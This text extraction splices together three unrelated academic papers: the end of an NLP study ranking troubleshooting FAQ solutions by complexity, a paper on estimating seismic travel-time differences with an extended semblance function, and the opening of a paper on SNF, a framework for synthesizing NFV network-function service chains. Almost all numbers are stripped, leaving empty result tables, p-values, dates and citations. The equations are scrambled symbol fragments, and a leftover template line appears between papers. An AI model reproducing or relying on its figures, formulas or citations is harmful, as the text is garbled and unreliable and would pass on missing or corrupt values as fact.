expected posi- tion model, positions were normalized before train- ing. let solution xir denote the rth solution in the solution set for problem pi, where ≤ r ≤ npi . we normalize r to a value between and using a min-max method: r′ = r− npi− . then the [ – ] range is divided into k bins. the identity of the bin containing r′ is taken as the normalized position, r. we tuned k experimentally during development and found that k = performed best. for our ordering experiments we used joachims’ ( ) svmrank package for training and testing. during training, the classifier learns to minimize the number of swapped pairs of solutions over the train- ing data. we used a linear kernel and the regulariza- tion parameter was tuned using grid search on the development data of each fold. we evaluate how well the model’s output agrees with gold-standard ordering using kendall’s τ. . results table summarizes our results (average kendall’s τ across folds). we present the results of the dis- criminative ranker when using a single feature class based on likelihood and expected complexity (posi- tion, permutation), length, and syntactico-semantic features (synsem), and their combinations (denoted via +). we also report the performance of a base- line which computes a random permutation for each solution set (random; results are averaged over five runs). we show results for all solution sets (all) and broken down into different set sizes (e.g., – , – ). as can be seen, the expected position model ob- tains an overall τ of . and the permutation model of . . these values lie in the range of human annotator agreement with the faq order (see sec- tion . ). in addition, we find that the models perform consistently across solution set sizes, with even higher correlations on longer sequences where our methods are likely to be more useful. posi- tion and permutation outperform random rankings and a model based solely on length features. the solution set sizes model – – > all ( ) ( ) ( ) ( ) random - . . - . . length - . - . - . - . synsem . . . . length+synsem . . . . position . . . . +length . . . . +synsem . . . . +synsem+length . . . . permutation . . . . +length . . . . +synsem . . . . +synsem+length . . . . table : kendall’s τ values on the solution reorder- ing task using -fold cross-validation and svm ranking models with different features. the results are broken down by solution set size (the number of sets per size is shown within parentheses). boldface indicates the best performing model for each set size. synsem features which measure the complexity of writing in the text are somewhat better but still in- ferior compared to position and permutation. us- ing a paired wilcoxon signed-rank test, we com- pared the τ values obtained by the different mod- els. the position and permutation performed sig- nificantly better (p < . ) compared to random, length and synsem baselines. however, τ differ- ences between position and permutation are not sta- tistically significant. with regard to feature com- binations, we observe that both models yield bet- ter performance when combined with length or synsem. the position model improves with the addition of both length and synsem, whereas the permutation model combines best with synsem features. the position+synsem+length model is significantly better than permutation (p < . ) but not permutation+synsem+length or position alone (again under the wilcoxon test). these results suggest that the solution ordering task is challenging with several factors influencing how a solution is perceived: the words used and their meaning, the writing style of the solution, and the amount of detail present in it. our data comes from the faqs produced by computer and operat- ing system manufacturers and other well-managed websites. as a result, the text in the faq solutions is of high quality. however, the same is not true model rank rank n both random . . . length . . . synsem . . . synsem+length . . . position . . . +length . . . +synsem . . . +synsem+length . . . permutation . . . +length . . . +synsem . . . +synsem+length . . . table : model accuracy at predicting the easiest solution correctly (rank ), the most difficult one (rank n), or both. bold face indicates the best performing model for each rank. for community-generated solution texts on discus- sion forums. in the latter case, we conjecture that the style of writing is likely to play a bigger role in how users perceive complexity. we thus expect that the benefit of adding length and synsem features will become stronger when we apply our models to texts from online forums. we also computed how accurately the models identify the least and most complex solutions. for solution sets of size and above (so that the task is non-trivial) we computed the number of times the rank one solution given by the models was also the easiest according to the faq gold-standard. like- wise, we also computed how often the models cor- rectly predict the most complex solution. with ran- dom rankings, the easiest and most difficult solu- tions are predicted correctly % of the time. get- ting both correct for a single problem happens only % of the time. the position+length model overall performs best, identifying the easiest and most diffi- cult solution % of the time. both types of solution are identified correctly % of the time. interest- ingly, the generative models are better at predicting the most difficult solution ( – %) compared to the easiest one ( – %). one reason for this could be that there are multiple easy solutions to try out but the most difficult one is probably more unique and so easier to identify. overall, we observe that the two generative mod- els perform comparably, with position having a slight lead over permutation. a key difference be- tween the models is that during training permutation observes the full ordering of solutions while posi- tion observes solutions coming from a few normal- ized position bins. also note that in the permuta- tion model, multiple solutions with the same com- plexity level are grouped together in a solution set. this property of the model is advantageous for or- dering as solutions with similar complexity should be placed adjacent to each other. at the same time, if levels and are flipped in the permutation sampled from the gmm, then any solution with complexity level will be ordered after the solution with com- plexity . the position model on the other hand, contains no special facility for grouping solutions with the same complexity. in sum, position can more flexibly assign complexity levels to individual solutions. conclusion this work contains a first proposal to organize and navigate crowd-generated troubleshooting data ac- cording to the complexity of the troubleshooting ac- tion. we showed that users perceive and agree on the complexity of alternative suggestions, and presented bayesian generative models of the troubleshooting data which can sort solutions by complexity with a performance close to human agreement on the task. our results suggest that search and summariza- tion tools for troubleshooting forum archives can be greatly improved by automatically predicting and using the complexity of the posted solutions. it should also be possible to build broad coverage au- tomated troubleshooting systems by bootstrapping from conversations in discussion forums. in the fu- ture, we plan to deploy our models in several tasks such as user authority prediction, expert interven- tion, and thread analysis. furthermore, we aim to specialize our models to include category-specific complexity levels and also explore options for per- sonalizing rankings for individual users based on their knowledge of a topic and the history of their troubleshooting actions. acknowledgements we would like to thank the editor and the anony- mous reviewers for their valuable feedback on an earlier draft of this paper. we are also thankful to members of the probabilistic models of language reading group at the university of edinburgh for their many suggestions and helpful discussions. the first author was supported by a newton international fellowship (nf ) from the royal society and the british academy. references r. barzilay and m. lapata. . modeling local coher- ence: an entity-based approach. computational lin- guistics, ( ): – . r. barzilay and l. lee. . catching the drift: proba- bilistic content models, with applications to generation and summarization. in proceedings of naacl-hlt, pages – . d. bollegala, n. okazaki, and m. ishizuka. . a bottom-up approach to sentence ordering for multi-document summarization. in proceedings of coling-acl, pages – . s. r. k. branavan, h. chen, l. s. zettlemoyer, and r. barzilay. . reinforcement learning for map- ping instructions to actions. in proceedings of acl- ijcnlp, pages – . s. r. k. branavan, d. silver, and r. barzilay. . learning to win by reading manuals in a monte-carlo framework. in proceedings of acl-hlt, pages – . h. chen, s. r. k. branavan, r. barzilay, and d. r. karger. a. content modeling using latent per- mutations. journal of artificial intelligence research, ( ): – . h. chen, s.r.k. branavan, r. barzilay, and d.r. karger. b. global models of document structure using latent permutations. in proceedings of naacl-hlt, pages – . j. eisenstein, j. clarke, d. goldwasser, and d. roth. . reading to learn: constructing features from semantic abstracts. in proceedings of emnlp, pages – . m. elsner, j. austerweil, and e. charniak. . a uni- fied local and global model for discourse coherence. in proceedings of naacl-hlt, pages – . m. a. fligner and j. s. verducci. . distance-based ranking models. journal of the royal statistical soci- ety, series b, pages – . d. heckerman, j. s. breese, and k. rommelse. . decision-theoretic troubleshooting. communications of the acm, ( ): – . t. joachims. . training linear svms in linear time. in proceedings of kdd, pages – . s. kim, l. cavedon, and t. baldwin. . classifying dialogue acts in one-on-one live chats. in proceedings of emnlp, pages – . m. lapata. . probabilistic text structuring: experi- ments with sentence ordering. in proceedings of acl, pages – . m. lapata. . automatic evaluation of information ordering. computational linguistics, ( ): – . m. lui and t. baldwin. . classifying user forum participants: separating the gurus from the hacks, and other tales of the internet. in proceedings of the australasian language technology workshop, pages – . n. madnani, r. passonneau, n. ayan, j. conroy, b. dorr, j. klavans, d. o’leary, and j. schlesinger. . measuring variability in sentence ordering for news summarization. in proceedings of the eleventh eu- ropean workshop on natural language generation. c. l. mallows. . non-null ranking models. i. biometrika, ( / ):pp. – . c. d. manning, m. surdeanu, j. bauer, j. finkel, s. j. bethard, and d. mcclosky. . the stanford corenlp natural language processing toolkit. in pro- ceedings of acl: system demonstrations, pages – . d. s. mcnamara, a. c. graesser, p. m. mccarthy, and z. cai. . automated evaluation of text and dis- course with coh-metrix. cambridge university press. g. a. miller. . wordnet: a lexical database for english. communication of the acm, ( ): – . s. schwarm and m. ostendorf. . reading level as- sessment using support vector machines and statistical language models. in proceedings of acl, pages – . a. vogel and d. jurafsky. . learning to follow navigational directions. in proceedings of acl, pages – . l. wang, m. lui, s. kim, j. nivre, and t. baldwin. . predicting thread discourse structure over tech- nical web forums. in proceedings of emnlp, pages – . your paper's title starts here: please center estimation algorithm for low frequency seismic motions based on extended semblance function lianming sun faculty of environmental engineering, the university of kitakyushu - hibikino, wakamatsu, kitakyushu - , japan, sun@kitakyu-u.ac.jp abstract. monitoring low frequency and long period ground motions is very important for earthquake detection and alarm systems, and signal processing techniques help to investigate the mechanism of deep ground motions and earthquake occurrence by detecting effective seismic information from the seismograms. in this paper a frequency domain algorithm is presented to estimate the travel time difference of seismic waves with multi-path interferences caused by the refraction effect. the spectra of the seismograms are calculated through the fast algorithm, and the multi- path parameters as well as the difference of travel time between a reference position and the seismographic stations are given by an optimization algorithm in the frequency domain. the new approach can work under conditions of refraction interference, and improve the estimation performance by using an extended semblance function. its effectiveness is demonstrated through some numerical examples, and it is shown that the proposed algorithm is applicable to the analysis of low frequency seismograms. keywords: spectral analysis, low frequency seismograms, semblance function, frequency domain. . introduction it has been revealed that the fault activities often accompany by low frequency underground motions, and long period of their accumulation may induce earthquakes. since many geological phenomena are so complicated that the mechanisms of deep ground tremors and fault slips still remain mysteries, it is difficult to construct an effective physical model for the low frequency motions. consequently, it is an essential task to monitor the low frequency seismic motions and then to give the alarm of earthquake occurrence. with the significant progress of instrumentation technology, several seismographic networks have been applied to directly monitor the seismic activities in the urgent earthquake detection and alarm systems. incorporated research institutions for seismology (iris) in america, international data center managed by comprehensive test ban treaty (ctbt), hi-net, kyoshin-net (k-net) in japan, are the typical monitoring networks [ ]. using the monitoring networks, the low slip or low-frequency earthquakes, which are considered as the characteristic mode of moment released at a deep structure of a subduction plate interface, are detected from the seismograms [ - ]. moreover, revealing their mechanisms may help to explore the intrinsic characteristics of seismic phenomena. nevertheless, the detected signals of low frequency seismograms do not have obvious p-wave and s-wave arrivals; hence it is not easy to locate the epicenters through the ordinary hypocenter determination method [ ]. some array signal processing methods were proposed to maximize a semblance function using a grid search algorithm, then to maximize the cylindrical wave index using steepest descent algorithm [ , ], or to synchronize the peak of correlation functions of the detected seismic waves in the array records [ ]. these methods were performed in time domain, and had been applied in analysis of seismic tremor in bungo channel region [ ], tokachi channel region [ ], kyoto basin [ ], and the long period ground motion of deep ground structure in yokohama city [ ]. furthermore, the large array scale is often desired in order to acquire much seismic information, whereas a fine grid is required to avoid local minimum in the existing time domain methods. as a result, they lead to considerably heavy computational load. on the other hand, the representation of semblance coefficient has been investigated in the frequency domain, and a frequency domain algorithm has been developed to reduce the computational complexity since some fast frequency algorithm can be utilized [ , ]. it could achieve the similar accuracy as that of the time domain; moreover, the performance of the presented frequency approach can be improved by compensating the discretization error at low sampling rate. however, when the seismic waves have refraction effects, the multi-path interferences occur and they will shift the maximum of the conventional semblance function due to the side-lobe effects of multi-path. as a result, the estimation accuracy of travel time as well as epicenter location degrades significantly; therefore the effective techniques to reduce the multi- path effects are necessary in the processing algorithms. an extended semblance function is investigated in this paper. by performing subspace decomposition of the spectral data space, the multi-path parameters can be estimated, and the optimization for the extended semblance function yields the estimation of travel time difference between a reference position and tiltmeter stations. it is seen that the multi-path effects can be handled easily in the frequency domain using the estimated parameters, and the estimation of fine travel time difference can improve the location accuracy of epicenter from the seismograms spectra in the proposed algorithm. some numerical simulations demonstrate the effectiveness of the proposed approach. . problem statement consider the seismograms observed by the tiltmeter arrays, which are composed of several stations in a tiltmeter network. if the separation distance between these stations is smaller than the wavelength of the interested low frequency seismograms, the sampling of the seismic waves holds most of the original information with little aliasing. in the seismograms of low frequency earthquake, though the records have not explicit p-wave and s-wave arrivals, they might be analyzed by array processing techniques to detect and locate the low frequency earthquakes, and to utilize the information to reveal the occurrence mechanism and activities in subduction zones. fig. tiltmeter array in monitoring network fig. illustrates a tiltmeter array in the monitoring network. it has l stations, and each station is equipped with a sensor unit at the bottom of a borehole deeper than m [ ]. assume that the separation between stations is smaller than the wavelength of seismic waves to reduce the affection of heterogeneity in crust and mantle. the conventional semblance function )( ref tc [ , ] is defined by                  k k l l ll k k l l ll tkttal tktta tc trv,smpref trv,smpref ref )( )( )( , ( ) where k is the sample number within the time window kk  , tref indicates a reference time, tsmp and tl, trv represent the sampling interval, the travel time difference of the lth station from a reference position, respectively, while the later is a function of the propagation path, wave velocity or the horizontal apparent slowness vector, which is a reciprocal vector of velocity. in [ ], the semblance function is maximized by finding an appropriate apparent slowness vector using a grid search algorithm, where the grid is set as small spacing in latitude and longitude, and the estimate of epicenter is determined from the estimated vector of apparent slowness. when the grid search algorithm in the time domain is used simultaneously for multiple arrays, the estimation efficiency will be very poor especially for smaller spacing in both latitude and longitude. an efficient frequency domain approach has been considered for the estimation of travel time difference by using the seismic spectra with low computational load [ ]. define the relation function of the observed signal at stations l and l as follows: .)()(),( ,    k k llllllll tnkttatnktta k nnr smpsmprefsmpsmpref ( ) then the numerator and denominator of the semblance function can be rewritten as , , , )( ,, , ,, ,                                                 l l ll ll l l l ll ll ll t t t t rl t t t t r l tc smp trv smp trv smp trv smp trv ref ( ) where [x] is the nearest integer to the real number x. it is easily seen that maximizing the semblance function ( ) is equivalent to maximizing the second term of ( ). on the other hand, let the fourier transform of the observed record be defined by ,)()(     k k ik l i l ff ekttaea smpref  ( ) where ff f /  is the f th frequency grid, fff  . then the inverse fourier transform of )()( * ff i l i l eaea   can be given by ).,()()()( , * , kkkreeaea kf kx ll f ff iki l i lll fff      ( ) therefore, the semblance function can be approximated by            l l ll l l l ll llll xl kkx l tc ref , , , )( , ( ) then )( ref tc in ( ) reaches a maximum if the values kl , l = kl - kl maximize the following function     ,,maxarg,, , ,, , , , ,         l l l ll llll kk ll kkxkk ll  ( ) and smptrvtrv tktt llll ,,,  . if the integer f is the power of , both )( fi l ea  and   llll kkx , , can be computed through the algorithm of fast fourier transform, therefore the algorithm can be performed efficiently [ ]. furthermore, a genetic algorithm based approach can be used to give the estimation of epicenter location [ ]. . extended semblance function assume that the observed signal at tiltmeter station l can be approximated as follows:  )()()( ,,,, smpref smpref smpref lllll kttagkttagktta  , ( ) where gl, , gl, and ,, , ll  are the gain and delay time of the direct wave, delayed wave, respectively. )( smpref ktta  is the source wave comes from the epicenter. then the spectral representation of )( smpref ktta l  can be given by ).()( )()()( , , ff fmlfff ii l i m m i ml k k ik l i l eaeg eaegekttaea            smpref ( ) it is seen that ,trv, ll t  if no delay waves in the observed signal )( smpref ktta l  . let the extended semblance function be given by                             l l f ff i l i l i l i l l l l ll f ff i l i l i l i l f f f f f f f f eg ea eg ea l eg ea eg ea l tc * * * * ref )( )( )( )( )( )( )( )( )(         , ( ) then the parameters of gl,m and ml , might be estimated by optimizing the semblance function in ( ). nevertheless, the direct optimization of ( ) is difficult since it is a severe nonlinear problem, and the optimization may converge to local solution easily. in order to improve the processing efficiency, a simplified semblance function will be used in the estimation algorithm. . estimation algorithm without loss of the generality, let the reference position be the tiltmeter station , and fix g , as g , = , then for l = , . . ., l, the travel time difference tl,trv of direct waves from the reference position is trvl, ,,   lt . let the sub- semblance function )( , ref tc l be given by     . )()()()()()()()( )()()()()()()()( )( **** **** ,           f ff ii l i l ii l iii l f ff i l ii l iii l ii l l ffffffff ffffffff egeaeaegegeaeaeg egeaeaegegeaeaeg tc ref   ( ) commonly only a few frequency components are contained in the seismograms, hence the optimization of ( ) will be an ill-conditioned problem, and is influenced by noise easily. instead the direct optimization, the optimization will be performed in the following procedures. a.initial values.set the initial values gl, = , gl, = gl, =…= , then the initial estimates of trvl, ,,   lt can be obtained by ( ). b.estimation of multi-path parameters.these parameters will be estimated by a subspace decomposition technique in a grid research way. construct a spectral data matrix ),,,,,( ,,,,  lll kkkk containing both the main lobe and the side-lobe of seismic waves as follows: , )()( )()( )()( )()( ),,,,,( , , )( )( )( )( )()( , , , , trv, , trv, , trv, , trv, , trv, , trv, , t l l t itkiitki itkiitki i l tkii l tki i l i l lll fllffllf fllffllf flfflf ff eaeeae eaeeae eaeeae eaea kkkk                                     Ω Ω Ω            ( ) where tl,trv is the estimate given in step a,  is a grid interval. in order to reduce the influence of noise, the subspace decomposition of ( ) is performed as follows: ),,,,,(),,,,,( ,,,,,,,,  lllll h l h lll kkkkkkkk ΩΩvsu  , ( ) then the noise subspace vectors  v , which are the last column vectors in vl, can be obtained. denote ,v and ,v as the parts corresponding to ,l Ω , ,l Ω , respectively, where , v is associated with the parameters g ,m, whereas ,v is associated with the parameters gl,m. therefore the optimal values of gl,m , kl,m will be given by   .)(maxarg ,,,,, , ,,,,,,,, ,,,,,,,, ,, ,,,, , ,,        vΩΩvvΩΩvvΩΩv vΩΩvvΩΩv l h l h l h l h l h l h l h l h l h l h kk mlm ml kkgg g    ( ) the first term in ( ) indicates an approximation of the extended semblance function )( , ref tc l , while the second one is the criterion for multi-path parameter estimation. on the other hand, instead of the extended semblance function, an appropriate pre-filter can be utilized to compensate the multi-path effect by using the estimates of gl,m and kl,m [ ]. c.optimization of extended semblance function.substitute the estimates of gl,m and kl,m into the extended semblance function )( , ref tc l , and leave trvl, t as a variable, then the optimization of )( , ref tc l with respect to trvl, t yields fine estimate of the difference of travel time between the tiltmeter stations and reference position. d.estimation of epicenter location.using the estimates of difference travel time trvl, t , the epicenter location can be estimated by the methods given in [ , ]. moreover, in order to decrease the influence of noise, the value of semblance function )( , ref tc l can be used as weight function for trvl, t in the epicenter estimation. . numerical examples some simulation examples are considered to investigate the effectiveness of the proposed algorithm. the main frequency components are within . ~ . hz, and the components beyond the frequency band, the interferences caused by refraction or reflection are considered as noise. the seismic wave travels at velocity of km/s. stations whose separation are within . km~ . km are utilized in the tiltmeter array, and simulation runs be performed in the example. the true locations of epicenter in runs are randomly distributed as normal distribution as n( . ', ( . ') ) west in longitude, n( . ', ( . ') south in latitude, as uniform distribution as ~ km in the depth from the reference station . there is a refraction wave in the layer depth of km. the seismograms are sampled at the sampling rate hz, and the records in a time window of s are used for the data analysis. the simulations are performed under the signal to noise ratio of . , , db, respectively. the estimation errors of difference travel time and epicenter location are summarized in tab. and . for comparison, the results of conventional methods without compensation of multi-path effects are also given in the tables. it is seen that the proposed algorithm can reduce the estimation errors under the situations with multi-path effects, and it works well especially if a great deal of data can be used in estimation even if the signal to noise ration is low. tab. standard deviation of difference travel time estimation in simulation runs method difference travel time(  s) . db db db conventional algorithm . . . proposed algorithm . . . tab. standard deviation of epicenter location in simulation runs method epicenter location (  %) . db db db conventional algorithm . . . proposed algorithm . . . . conclusions the extended semblance function based algorithm has been proposed to estimate the difference of travel time and the epicenter location for low frequency seismograms. it has been shown that the proposed algorithm can perform optimization in the frequency domain, where the side-lobe can be treated by the shift property of signal spectra. compared with the conventional methods, the proposed algorithm improves the estimation accuracy of the difference travel time when the seismograms have multi-path effects; therefore it can help to locate the epicenter more precisely. the approach to the case with several epicenters, and the effectiveness validation of the real seismograms will be investigated in the future work. references [ ] m. kikuchi. realtime seismology, university of tokyo press, [ ] k. obara. “nonvolcanic deep tremor associated with subduction in southwest japan,” science, vol. , pp. - , . [ ] h. hirose and k. obara.“repeating short- and long-term slow slip events with deep tremor activity around the bungo channel regions, southwest japan,”earth planets space, vol. , pp. - , . [ ] committee for earthquake prediction studies, seismological society of japan.the science of earthquake prediction, university of tokyo process, . [ ] y. asano, k. obara and y. ito. “spatiotemporal distribution of very-low frequency earthquakes in tokachi-oki near the junction of the kuril and japan trenches revealed by using array signal processing, ” earth planets space, vol. , pp. - , . [ ] n.s. neidell and m.t.taner.“semblance and other coherency measures for multichannel,”geophysics,vol. , pp. - , . [ ] c. shirakawa and t. iwata.“ground motion characteristics of south-east kyoto basin site using three dimensional small aperture seismic array at uji campus, kyoto university,”annuals of disaster prevention research institute, kyoto university, no. (b), pp. - , . [ ] h. miura and s. midorikawa.“effects of -d deep underground structure on characteristics of rather long-period ground motion,” earthquake, no. , pp. - , . [ ] w. zhu, l. sun and x. zhu.“analysis of low frequency seismograms in frequency domain,”icic express letters, vol. , no. (a), pp. - , . [ ] l. sun and a.sano.“system identification and error analysis in frequency domain,”international journal of innovative computing, information and control, vol. , no. , pp. - , . [ ] w. zhu, l. sun and x. zhu.“epicenter location via genetic algorithm for low frequency seismograms, icic express letters, vol. (to appear) [ ] g. jacovitti and g. scarano. “discrete time techniques for time delay estimation,” ieee trans. signal processing, vol. , no. , pp. - , . submitted september accepted october published november corresponding author georgios p. katsikas, katsikas@kth.se academic editor pamela zave additional information and declarations can be found on page doi . /peerj-cs. copyright katsikas et al. distributed under creative commons cc-by . open access snf: synthesizing high performance nfv service chains georgios p. katsikas , marcel enguehard , , maciej kuźniar , gerald q. maguire jr and dejan kostić department of communication systems (cos), school of information and communication technology (ict), kth royal institute of technology, kista, stockholm, sweden network and computer science department (infres), telecom paristech, paris, france paris innovation and research laboratory (pirl), cisco systems, paris, france abstract in this paper we introduce snf, a framework that synthesizes (s) network function (nf) service chains by eliminating redundant i/o and repeated elements, while consolidating stateful cross layer packet operations across the chain. snf uses graph composition and set theory to determine traffic classes handled by a service chain composed of multiple elements. it then synthesizes each traffic class using a minimal set of new elements that apply single-read-single-write and early-discard operations. our snf prototype takes a baseline state of the art network functions virtualization (nfv) framework to the level of performance required for practical nfv service deployments. software-based snf realizes long (up to nfs) and stateful service chains that achieve line-rate gbps throughput (up to . x greater than the baseline nfv framework). hardware-assisted snf, using a commodity openflow switch, shows that our approach scales at gbps for internet service provider-level nfv deployments. subjects computer networks and communications keywords nfv, service chains, synthesis, single-read-single-write, line-rate, gbps introduction middleboxes hold a prominent position in today’s networks as they substantially enrich the dataplane’s functionality (sherry et al., ; gember-jacobson et al., ). however, to manage traditional middleboxes requires costly capital and operational expenditures; hence, network operators are adopting network functions virtualization (nfv) (european telecommunications standards institute, ). among the first challenges in nfv was to scale software-based packet processing by exploiting the characteristics of modern hardware architectures. to do so, several works leveraged parallelism first across multiple servers and then across multiple cores, sockets, memory controllers, and graphical processing units (gpus) (han et al., ; kim et al., b) within a single server (dobrescu et al., ; dobrescu et al., ). attaining hardware-based forwarding performance was difficult to achieve, even with highly-scalable software-based packet processing frameworks. the main reason was the poor i/o performance of these frameworks. thus, the focus of both industry and academia shifted to customizing operating systems (oss) to achieve high-speed network i/o. for example, by using batch packet processing (kim et al., ), static memory pre-allocation, and zero copy data transfers (rizzo, ; dpdk, ). how to cite this article katsikas et al. ( ), snf: synthesizing high performance nfv service chains. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:katsikas@kth.se https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. we provide a detailed comparison of our work with both e and openbox in the ‘related work’ section. modern applications require combinations of network functions (nfs), also known as service chains, to satisfy their services’ quality requirements (quinn & nadeau, ). with all the above advancements in place, nfv instances achieved line-rate forwarding at tens of millions of packets per second (mpps); however, performance issues remain when several nfs are chained together. state of the art frameworks such as clickos (martins et al., ) and netvm (hwang, ramakrishnan & wood, ) have reported substantial throughput degradation when realizing chains of interconnected, monolithic nfs. the first consolidation attempts targeted application layer (e.g., deep packet inspection) (bremler-barr et al., ) and session layer (e.g., http) (sekar et al., ) consolidation. however, a lot of redundancy still resides lower in the network stack. anderson et al. ( ) describe how xomb allows them to build programmable and extensible open middleboxes specialized for request/response based communication. in addition, slick (anwer et al., ) introduced a programming language to deploy network-wide service chains, driven by a controller. slick avoids redundant operations and shares common elements; however, its decentralized consolidation still realizes a chain of nfs as distributed processes. most recently, e (palkar et al., ) showed how to schedule nfs across a cluster of machines for high throughput. also, openbox (bremler-barr, harchol & hay, ) introduced an algorithm that merges processing graphs from different nfs into a single processing graph. contemporaneously with e and openbox, our work implements the mechanisms fully specified in (enguehard, ) and represents the next logical step in high-performance nfv research. in the case of network-wide deployments, chains suffer from the latency imposed by interconnecting different machines, processes, and switches, along with potential virtualization overheads. in the case of single-server deployments, where the nfs are pinned to a specific (set of) core(s), throughput is bounded by the increasing number of context switches as the length of the chain increases. based on our measurements, context switches cause a domino effect on cache utilization because of continuous data invalidations and the number of cpu cycles spent forwarding packets along the chain. this leads to increased end-to-end packet latency and considerable variation in latency (jitter). in this paper, we describe the design and implementation of the synthesized network functions (snf), our approach for dramatically increasing the performance of nfv service chains. the idea in snf is simple: create spatial correlation to execute service chains as possible to the speed of the cpu cores operating on the fastest, i.e., l , cache of modern multi-core machines. snf leverages the ever-continuing increases in numbers of cores of modern multi-core processor architectures and the recent advances in user-space networking. snf automatically derives traffic classes of packets that are traversing a provider-specified service chain of nfs. packets in a traffic class are all processed the same way. additionally, snf handles stateful nfs. using its understanding of each of the per-traffic class chains, snf then synthesizes equivalent, high-performance nfs for each of the traffic classes. in a straightforward snf deployment, one cpu core processes one traffic class. in practice, snf allocates multiple cpu cores to execute different sets of traffic classes in isolation (see the ‘snf overview’ section). katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. snf’s optimization process performs the following tasks: (i) consolidates all the read operations of a traffic class into one element, (ii) early-discards those traffic classes that lead to packet drops, and (iii) associates each traffic class with a write-once element. moreover, snf shares elements among nfs to avoid unnecessary overhead, and compresses the number and length of the chain’s traffic classes. finally, snf scales with an increasing number of nfs and traffic classes. this architecture shifts the challenge to packet classification, as one component of snf has to classify an incoming packet into one of the pre-determined traffic classes, and pass it to the synthesized function. we extended popular, open-source software to improve the performance of software-only packet classification. in addition, we employed an openflow (mckeown et al., ) switch as a packet classifier to demonstrate the performance possible by a sufficiently powerful programmable network interface (commonly abbreviated as nic). the benefits of snf for network operators are multifold: (i) snf dramatically increases the throughput of long nf chains, while achieving low latency, and (ii) it does so while preserving the functionality of the original service chains. we implemented the snf design principles into an appropriately modified version of the click (kohler et al., ) framework. to demonstrate snf’s performance, we compare it against the fastest click variant to date, called fastclick (barbette, soldani & mathy, ). to show snf’s generality we tested its performance in three uses cases: (i) a chain of software routers, (ii) nested network address and port translators (napts) (liu et al., ), and (iii) access control lists (acls) using actual nf configurations taken from internet service providers (isps) (taylor & turner, ). our evaluation shows that software-based snf achieves gbps, even with small ethernet frames, across long (up to nfs), stateful chains. in particular, it achieves up to . x more throughput and x lower latency with – . x lower latency variance than the original nf chains implemented with fastclick, when running on the same hardware. offloading traffic classification to a commodity openflow switch allows snf to realize re- alistic isp-level chains at gbps (for most of the frame sizes), while bounding the median chain latency to below µs (measured from separate sending and receiving machines). in the rest of this paper, we provide an overview of snf in the ‘snf overview’ section. we introduce our synthesis approach in the ‘snf architecture’ section and a motivating example in the ‘a motivating use case’ section. implementation details and performance evaluation are presented in the ‘implementation’ section and in the ‘performance evaluation’ section, respectively. we discuss verification aspects in the ‘verification’ section. the ‘limitations’ section discusses the limitations of this work and the ‘related work’ section positions our work with respect to the state of the art. finally, the ‘conclusion’ section concludes this paper. snf overview the idea of synthesizing network service components consorts with a powerful property: data correlation in network traffic. in a network system, this property is mapped to spatial locality with respect to the receiver’s caches. snf aggregates parts of the flow space into katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. core multi-threaded snf classifier with chain-level traffic class units (tcus) snf rewriter-core snf rewriter-core snf rewriter-core snf rewriter-core k traffic domain symmetric receive-side scaling bi-directional flow traffic domain ... dedicated cores per nic for i/o core snf synthesizer with stateful per core rewriters figure an overview of snf running on a machine with k cpu cores and nics. dedicated cpu cores per nic deliver bi-directional flows to packet processing cpu cores via symmetric rss. processing cores concurrently classify traffic and access individual, stateful snf rewriters to modify the traffic. traffic class units (tcus) (the detailed definition is given in the ‘abstract service chain representation’ section), which are then mapped to sets of (re)write operations. by carefully setting the cpu affinity of each tcu, this aggregation enforces a high degree of correlation in the traffic (seen as logical units of data) resulting in high cache hit rates. our overarching goal is to design a system that efficiently utilizes per core and across cores cache hierarchies. with this in mind, we design snf based on fig. . in the example shown in this figure, we assume that a network operator wants to deploy a service chain between network domains and . for simplicity we also assume that there is one nic per domain. a set of dedicated cores (i.e., core and for the nics facing domains and , respectively) attempts to read and write frames at line-rate. once a set of frames is received, say by core , it is transferred to the available processing cores (i.e., cores to k). frame transfers can occur at high speed via a shared cache, which has substantial capacity in modern hardware architectures. once a processing core acquires a frame, it executes snf as shown in fig. . first the core classifies the frame (green rectangles in fig. ) in one of the chain’s tcus and then applies the required synthesized modifications (blue rounded-rectangle in fig. ) that correspond to this tcus out of the chain. both classification and modification processes are highly parallelized as different cores can simultaneously process frames that belong to different tcus. we detail both processes in the ‘synthesis steps’ section. the key point of fig. is that a core’s pipeline shares nothing with any other pipeline. we employed the symmetric receive side scaling (rss) (intel, ) scheme by woo & park ( ) to hash input traffic in a way that a flows’ bi-directional packets are always served by the same snf rewriter, hence the same processor. this scheme allows a core to process a tcu at the maximum processing speed of the machine. main objectives the primary goal of snf is to eliminate redundancy along the chain. the sources of redundancy in current nf chains and the solutions that our approach offers are: katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (a) multiple network i/o interactions between the chain and the backend dataplane occur because each nf is an individual process. we solve this by placing nf chains in a single logical entity. once a packet enters this entity, it does not exit until all the chain operations are applied. (b) late packet drops appear in nf chain implementations when packets unnecessarily pass through several elements before getting dropped. snf discards these packets as early as possible. (c) multiple read operations on the same field occur because each nf contains its own decision elements. a typical example is an internet protocol (ip) lookup in a chain of routers. while snf is parsing the initial chain, it collects the read operations and constructs traffic classes encoded as paths of elements in a directed acyclic graph (dag). then, snf synthesizes these elements into a single classifier to realize both routing and filtering. (d) multiple write operations on the same field overwrite previous values. for example, the ip checksum is modified twice when a decrement time to live (ttl) operation follows a destination ip address modification. snf associates a set of (stateful) write operations with a traffic class, hence it can modify each field of a traffic class all at once. next, we describe in detail how snf automatically synthesizes the equivalent of a service chain. snf architecture taking into account the main objectives listed above, this section presents the design of snf. the ‘abstract service chain representation’ section defines the synthesis abstraction, the ‘synthesis steps’ section presents the formal synthesis steps, and the ‘managing stateful functions’ section describes how stateful functions are realized. abstract service chain representation the crux of snf’s design is an abstract service chain representation. we begin by describing a mathematical model to represent packet units in the ‘packet unit representation’ section. next, we model an nf’s behavior in an abstract way in ‘network function representation’ section. finally, we define our target service-level network function in ‘the synthesized network function’ section. packet unit representation inspired by the approach of kazemian, varghese & mckeown ( ), we represent each packet as a vector in a multi-dimensional space. however, we follow a protocol-aware 